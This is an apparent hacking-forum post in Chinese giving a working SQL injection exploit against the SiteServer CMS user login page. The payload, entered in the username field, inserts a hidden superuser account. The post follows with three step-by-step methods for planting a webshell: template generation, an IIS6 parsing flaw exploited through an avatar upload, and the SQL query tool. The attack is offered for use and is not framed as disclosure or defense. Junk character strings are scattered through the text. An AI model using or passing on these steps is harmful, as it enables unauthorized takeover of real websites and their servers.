找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2737|回复: 0
打印 上一主题 下一主题

SiteServer CMS UserCenter/login.aspx页面用户名处sql注射

[复制链接]
跳转到指定楼层
楼主
发表于 2013-2-16 21:40:46 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
8 j% k3 t) X/ E# l  |$ ?; Qstieserver官网:www.siteserver.cn3 V! o, p: X  p  ^) i
EXP:1 j/ N2 k8 ^$ }3 T( g0 c3 ^  k
直接访问UserCenter/login.aspx
  U. u. J) s7 H; F& A" t* b用户名处输入:
+ z* V' ]$ J8 i& R
+ v! Y1 A9 J. S123′insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values(‘blue’,'VffSUZcBPo4=’,'Encrypted’,'i7jq4LwC25wKDoqHErBWaw==’);insert into bairong_AdministratorsInRoles values(‘Administrator’,'blue’);insert into bairong_AdministratorsInRoles values(‘RegisteredUser’,'blue’);insert into bairong_AdministratorsInRoles values(‘ConsoleAdministrator’,'blue’);–
) p9 [: Q% B. v  V5 v) ]密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
: D( @' t( [. r之后再访问后台SiteServer/login.aspx用插入的用户登陆
/ _8 y& F. W' ^" a. D- E后台拿webshell的三种方法:& b/ t( ]" H6 o2 K+ Z
一、
/ I* r2 ]: y9 \( G1 O1 \站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
: ~" e8 u4 |' O3 P2 e二、- r; i% O' f4 d' s9 F4 b% A
成员权限-》添加用户-》用户名为:1.asp
+ Q; N) u  _0 g$ U  v! ?http://127.0.0.1/usercenter/
  [* B' v% @  }/ g3 v" z& h& N用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell
% K8 l9 f% }. g(ps:后台添加用户时不会验证是否含有非法字符)9 H* f" @$ N7 C9 K4 w: {& r' I' i
三、: p' I" A8 D9 m  ?9 r2 l
系统工具-》实用工具-》机器参数查看
) b4 u' Q8 \) o; g5 y# o可以看到数据库类型、名称,WEB路径
0 `+ M+ ~: Q3 B. X, _系统工具-》数据库工具-》SQL语句查询
' p5 y& {5 {& S$ s  B) ^" |: }这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表